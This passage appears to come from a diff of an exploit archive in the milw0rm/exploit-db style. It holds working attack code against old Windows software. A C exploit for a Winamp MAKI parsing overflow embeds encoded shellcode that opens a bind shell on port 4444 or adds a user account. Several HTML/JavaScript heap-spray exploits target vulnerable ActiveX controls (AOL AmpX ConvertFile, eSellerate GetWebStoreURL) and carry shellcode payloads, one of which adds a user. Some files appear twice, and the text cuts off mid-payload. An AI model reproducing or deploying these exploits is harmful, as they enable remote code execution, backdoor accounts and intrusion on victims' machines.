"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
"\x4e\x46\x43\x36\x42\x50\x5a";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */
char Bind_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
"\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
"\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
"\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
/* win32_adduser - PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */
char Add_User_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */
int input;
printf("\n------------------------------------------------------");
printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
printf("\n\nExploit created by n00b");
printf( "\n[1]. Calc Shell_Code" );
printf( "\n[2]. Bind Shell_Code on port 4444" );
printf( "\n[3]. Add user Shell_Code" );
printf( "\n[4]. To exit and cancel" );
printf( "\nPlease chose your Shell_Code:" );
scanf( "%d", &input );
switch ( input )
{
case 1:
for (i=0; i<sizeof(Calc_ShellCode); i++)
fputc(Calc_ShellCode[i], fp);
break;
case 2:
for (i=0; i<sizeof(Bind_Shellcode); i++)
fputc(Bind_Shellcode[i], fp);
break;
case 3:
for (i=0; i<sizeof(Add_User_Shellcode); i++)
fputc(Add_User_Shellcode[i], fp);
break;
case 4:
return 0;
break;
}
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-26]

100
platforms/windows/remote/4250.html
View file

@ -1,50 +1,50 @@
<html>
<!--
+++++++++++++++++++++++
+Last Modified by lhoang8500++
+++++++++++++++++++++++
-->
<html>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
<SCRIPT language="javascript">
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
};
var buffer = unescape("%u0505");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0505");
target.GetComponentVersion(buffer);
</script>
</html>
# milw0rm.com [2007-07-31]
<html>
<!--
+++++++++++++++++++++++
+Last Modified by lhoang8500++
+++++++++++++++++++++++
-->
<html>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>
<SCRIPT language="javascript">
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
};
var buffer = unescape("%u0505");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0505");
target.GetComponentVersion(buffer);
</script>
</html>
# milw0rm.com [2007-07-31]

162
platforms/windows/remote/8733.html
View file

@ -1,81 +1,81 @@
<!--
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
by rgod
site: http://retrogod.altervista.org/
Notes by Nine:Situations:Group : an old unreleased one from rgod's archive,
*not* the same of http://www.kb.cert.org/vuls/id/568681
*not* the same of http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=623
(different clsid)
No one talks about the ConvertFile() method...
STILL FUCKING WORKSSSSS LOL!!!
AOL still serves the cab with the vulnerable control!!!
It seems to me that this is exploited in the wild:
http://www.google.com/search?q=FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6&hl=en&num=100&filter=0
details:
CLSID: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6}
Progid: WinAmpX.IWinAmpActiveX.2
Binary Path: C:\PROGRA~1\COMMON~1\Nullsoft\ActiveX\2.4\AmpX.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<HTML>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' width=1 height=1 id='IWinAmpActiveX'
codebase="http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab">
</OBJECT>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<SCRIPT language='VBScript'>
'first block must set eax to 0xffffffff, the second one overwrites seh
bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
</SCRIPT>
</HTML>
# milw0rm.com [2009-05-19]
<!--
AOL IWinAmpActiveX Class (AmpX.dll 2.4.0.6) ConvertFile() remote overflow exploit (IE6/IE7)
by rgod
site: http://retrogod.altervista.org/
Notes by Nine:Situations:Group : an old unreleased one from rgod's archive,
*not* the same of http://www.kb.cert.org/vuls/id/568681
*not* the same of http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=623
(different clsid)
No one talks about the ConvertFile() method...
STILL FUCKING WORKSSSSS LOL!!!
AOL still serves the cab with the vulnerable control!!!
It seems to me that this is exploited in the wild:
http://www.google.com/search?q=FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6&hl=en&num=100&filter=0
details:
CLSID: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6}
Progid: WinAmpX.IWinAmpActiveX.2
Binary Path: C:\PROGRA~1\COMMON~1\Nullsoft\ActiveX\2.4\AmpX.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<HTML>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' width=1 height=1 id='IWinAmpActiveX'
codebase="http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab">
</OBJECT>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<SCRIPT language='VBScript'>
'first block must set eax to 0xffffffff, the second one overwrites seh
bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
</SCRIPT>
</HTML>
# milw0rm.com [2009-05-19]

72
platforms/windows/webapps/37319.html Executable file
View file

@ -0,0 +1,72 @@
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{C915F573-4C11-4968-9080-29E611FDBE9F}"></object>
<br>Tango DropBox Activex Heap Spray Exploit</br>
<br>Version:3.1.5 + PRO</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://etonica.com/dropbox/index.html</br>
<br>Software Link:http://etonica.com/dropbox/download.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1K0hnYS -->
<SCRIPT>
var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 5000;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize)
{
while (sprayContainer.length*2<sprayContainerSize)
{
sprayContainer += sprayContainer;
}
sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>

72
platforms/windows/webapps/37320.html Executable file
View file

@ -0,0 +1,72 @@
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{25982EAA-87CC-4747-BE09-9913CF7DD2F1}"></object>
<br>Tango FTP Activex Heap Spray Exploit</br>
<br>Version:1.0(Build 136)</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://www.tangoftp.com/index.html</br>
<br>Software Link:http://www.tangoftp.com/downloads/index.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1fjtq89 -->
<SCRIPT>
var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
